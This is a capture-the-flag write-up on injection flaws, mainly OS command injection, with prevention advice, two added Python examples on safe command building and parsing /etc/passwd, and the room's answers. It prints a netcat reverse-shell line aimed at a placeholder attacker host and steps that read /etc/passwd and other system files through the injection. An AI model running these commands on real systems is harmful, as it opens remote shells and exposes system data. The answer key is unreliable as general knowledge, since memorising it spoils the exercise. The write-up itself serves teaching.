Injection

Date: 26 December 2020

Author: Dhilip Sanjay S


  • Injection flaws occur when user-controlled input is interpreted by the application as commands or parameters instead of being treated as plain data.

SQL Injection

  • Access, modify and delete information in a database.

OS Command Injection

  • Execute arbitrary system commands on the server, which gives an attacker a foothold on that host (and on anything the host can reach), running with the privileges of the web application's OS user.

  • Can be used to open up a reverse shell, for example by making the target's netcat connect back to a listener the attacker controls (the IP and port below are placeholders):

    nc -e /bin/bash <attacker-ip> <port>

  • Note: the -e option exists only in some netcat builds (the traditional netcat and nmap's ncat); the OpenBSD netcat shipped by many distributions does not have it.
  • Types:

    • Blind Command Injection - the injected command runs on the server, but its output is not returned to the user in the HTML document, so execution has to be inferred indirectly (for example via a time delay, a DNS/HTTP callback, or a file written somewhere the attacker can later read).

    • Active Command Injection - the command's output is returned to the user; it can surface in several HTML elements, so what was executed is directly visible in the response.

Preventing Injection Attacks

  • Using an allow list (white list): accept only input that matches a strict expected format (for example a valid IP address) and reject everything else.

  • Stripping input that contains dangerous characters (shell metacharacters such as ; | & ` $ ( ) < > and newlines). This is a deny list, so it is weaker than an allow list: it only blocks what you thought of.

  • Better still, avoid invoking a shell at all: pass the program an argument array, or use a library API that does the job without building a command line.

Note: There are various libraries that perform these tasks.


Command Injection Practical

  • PHP passthru() function - executes the command string it is given, then passes the raw output directly to the browser. If user input is concatenated into that string, the user controls part of the command.

  • Warning: When allowing user-supplied data to be passed to this function, use escapeshellarg() or escapeshellcmd() to ensure that users cannot trick the system into executing arbitrary commands. Prefer escapeshellarg(): it wraps the value in single quotes so it is passed as exactly one argument, whereas escapeshellcmd() only escapes metacharacters and still lets an attacker append extra arguments to the command.
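The following is an added example (not code from the original page or from the room's PHP application) that mirrors the passthru() pattern in Python: a command string built by concatenating user input, beside the two defences listed under Preventing Injection Attacks (an allow list and argument quoting) and the argument-array form that avoids the shell entirely. The ping command, the IPv4 allow list and the attacker input string are assumptions chosen for illustration; shlex.quote plays the role escapeshellarg() plays in PHP.

```python
import re
import shlex
import subprocess
from typing import List

# Constructed attacker input: ';' ends the ping command and chains a second one.
INJECTED_INPUT = "127.0.0.1; cat /etc/passwd"


def build_ping_command_unsafe(user_input: str) -> str:
    """Vulnerable pattern: user input concatenated into a shell command string.
    This is what passthru("ping -c 1 " . $_GET['ip']) does; a shell would run both commands."""
    return "ping -c 1 " + user_input


IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def is_allowed_ipv4(value: str) -> bool:
    """Allow list: accept only a dotted quad with octets 0-255, reject everything else.
    A metacharacter, a space or a second command cannot match this pattern."""
    if not IPV4_RE.match(value):
        return False
    return all(0 <= int(octet) <= 255 for octet in value.split("."))


def build_ping_argv_safe(user_input: str) -> List[str]:
    """Hardened form: validate against the allow list, then pass the value as a
    single argv element so that no shell ever parses it."""
    if not is_allowed_ipv4(user_input):
        raise ValueError("rejected: not a valid IPv4 address")
    return ["ping", "-c", "1", user_input]


def is_rejected(user_input: str) -> bool:
    """True if the hardened builder refuses the input."""
    try:
        build_ping_argv_safe(user_input)
    except ValueError:
        return True
    return False


def quoted_for_shell(user_input: str) -> str:
    """If a shell string is unavoidable, quote the argument (escapeshellarg equivalent):
    the whole value becomes one single-quoted word, so ';' is just data."""
    return "ping -c 1 " + shlex.quote(user_input)


def run_safe(user_input: str) -> int:
    """Run ping without a shell; returns the process exit code (assumes ping is installed)."""
    return subprocess.run(build_ping_argv_safe(user_input), capture_output=True).returncode


if __name__ == "__main__":
    print("unsafe:", build_ping_command_unsafe(INJECTED_INPUT))
    print("quoted:", quoted_for_shell(INJECTED_INPUT))
    print("argv:  ", build_ping_argv_safe("127.0.0.1"))
    print("rejected:", is_rejected(INJECTED_INPUT))
```

The allow list is the primary control; quoting is the fallback for code that must keep a shell string, and the argument-array form removes the shell from the picture so there is nothing left to inject into.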

  • Ways to Detect Active Command Injection

    • Linux

    • Windows

Solutions

What strange text file is in the website root directory?

  • Answer: drpepper.txt


How many non-root/non-service/non-daemon users are there?

  • Answer: 0

  • Steps to Reproduce: read /etc/passwd through the injection (cat /etc/passwd) and count the entries whose UID is 1000 or above and whose shell is a real login shell.

  • The /etc/passwd file is a colon-separated file that contains the following information:

  1. Username: used when the user logs in. It should be between 1 and 32 characters in length.

  2. Password: an x character indicates that the encrypted password is stored in the /etc/shadow file. Note that you need to use the passwd command to compute the hash of a password typed at the CLI, or to store/update the hash of the password in the /etc/shadow file.

  3. User ID (UID): each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. UIDs 100-999 are reserved by the system for administrative and system accounts/groups; regular users start at 1000.

  4. Group ID (GID): the primary group ID (stored in the /etc/group file).

  5. User ID Info: the comment (GECOS) field. It allows you to add extra information about the user such as the user's full name, phone number etc. This field is used by the finger command.

  6. Home directory: the absolute path to the directory the user will be in when they log in. If this directory does not exist, the user's home directory becomes /.

  7. Command/shell: the absolute path of a command or shell (/bin/bash). Typically this is a shell, but it does not have to be one. For example, a sysadmin can use the nologin shell, which acts as a replacement shell for service accounts. If the shell is set to /sbin/nologin and the user tries to log in to the Linux system directly, the /sbin/nologin shell closes the connection.
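An added example (not part of the original write-up) that applies the field description above: it parses /etc/passwd lines into the seven fields, lists the accounts a person could actually log in with (UID 1000 or higher, not the nobody account with UID 65534, and a shell that is not nologin/false), and looks up a given user's shell, which is the check behind the next two questions as well. The passwd lines are a constructed sample, not the contents of the target machine, so the count here is 1 rather than the room's answer of 0.

```python
from typing import Dict, List

# Constructed sample of /etc/passwd lines (assumption: not taken from the target machine).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
alice:x:1000:1000:Alice Example,,,:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/usr/sbin/nologin
"""

# The seven colon-separated fields, in file order.
FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")

# Shells that refuse interactive logins; an account with one of these is a service account.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split each line on ':' into the seven fields; skip blanks, comments and malformed lines."""
    entries: List[Dict[str, str]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            continue
        entries.append(dict(zip(FIELDS, parts)))
    return entries


def human_users(entries: List[Dict[str, str]]) -> List[str]:
    """Names of non-root, non-service accounts: UID >= 1000 (regular users on
    Debian/Ubuntu), not nobody (65534), and a shell that allows logins."""
    result = []
    for entry in entries:
        uid = int(entry["uid"])
        if uid < 1000 or uid == 65534:
            continue
        if entry["shell"] in NON_LOGIN_SHELLS:
            continue
        result.append(entry["name"])
    return result


def shell_of(entries: List[Dict[str, str]], name: str) -> str:
    """The login shell (seventh field) of the named account."""
    for entry in entries:
        if entry["name"] == name:
            return entry["shell"]
    raise KeyError(name)


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    print("human users:", human_users(users))
    print("www-data shell:", shell_of(users, "www-data"))
```

Running the same functions over the real file fetched through the injection reproduces the answers: the web server's own account shows up with a nologin shell, and any account with a UID of 1000 or above and a real shell is one of the "non-root/non-service/non-daemon" users the question asks about.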


What user is this app running as?

  • Answer: www-data

  • Steps to Reproduce: whoami


What is the user's shell set as?

  • Answer: /usr/sbin/nologin

  • Steps to Reproduce: find the www-data line in /etc/passwd; the seventh (last) field is the login shell.


What version of Ubuntu is running?

  • Answer: 18.04.4

  • Steps to Reproduce:


  • Answer: DR PEPPER

  • Steps to Reproduce:

    • This question took a lot of time for me to solve.

    • On googling what motd is in Linux: /etc/motd is a file on Unix-like systems that contains a "message of the day".

    • So, I entered the command cat /etc/motd, but there was no output.

    • Next, I used the locate command to find the location of motd: locate motd

    • It seemed like update-motd.d was a directory, so I listed the files inside it: ls /etc/update-motd.d

    • The hint said 00-header, so I printed the contents of this file: cat /etc/update-motd.d/00-header

    • The last line was DR PEPPER MAKES THE WORLD TASTE BETTER!.

    • As expected, DR PEPPER was the answer.
